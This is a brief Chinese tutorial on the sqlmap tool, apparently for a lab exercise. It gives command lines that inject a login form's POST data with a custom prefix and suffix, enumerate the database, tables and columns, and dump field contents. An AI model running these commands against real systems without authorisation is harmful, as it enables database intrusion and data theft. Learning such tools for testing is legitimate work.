下载地址:https://sqlmap.org

用法

sqlmap.py -u "URL" --data
"uname=dong&passwd=doong&submit=Submit" --prefix "%22%29" --suffix "%23"

如果没用data的话,就直接下面命令,并且不需要注入前缀和后缀

Sqlmap.py -u URL/index.php?id=1 --current-db

其中, -u :指定URL,后面跟注入点的地址即可
--data :通过POST发送的数据字符串
--prefix :自定义注入的字符串的前缀
--suffix :自定义注入的字符串的后缀

sqlmap.py -u "URL" --data
"uname=dong&passwd=doong&submit=Submit" --prefix "%22%29" --suffix "%23" --current‐db

--current-db :列出当前使用的数据库

sqlmap.py -u "URL" ‐‐data
"uname=dong&passwd=doong&submit=Submit" --prefix "%22%29" --suffix "%23" -D sql100510018 --tables

-D :指定数据库
--tables :对当前数据库中的表进行猜解

sqlmap.py -u "URL" --data
"uname=dong&passwd=doong&submit=Submit" --prefix "%22%29" --suffix "%23" -D sql100510018 -T
successful --columns

-T :指定数据表
--columns :猜解当前表下的列内容

sqlmap.py -u "URL" --data
"uname=dong&passwd=doong&submit=Submit" --prefix "%22%29" --suffix "%23" -D sql100510018 -T
successful -C "congratulation,overlook" --dump

-T :指定数据表
-C 可以跟 --dump 连用,获取指定的字段内容

© 版权声明
本站所有文章禁止转载!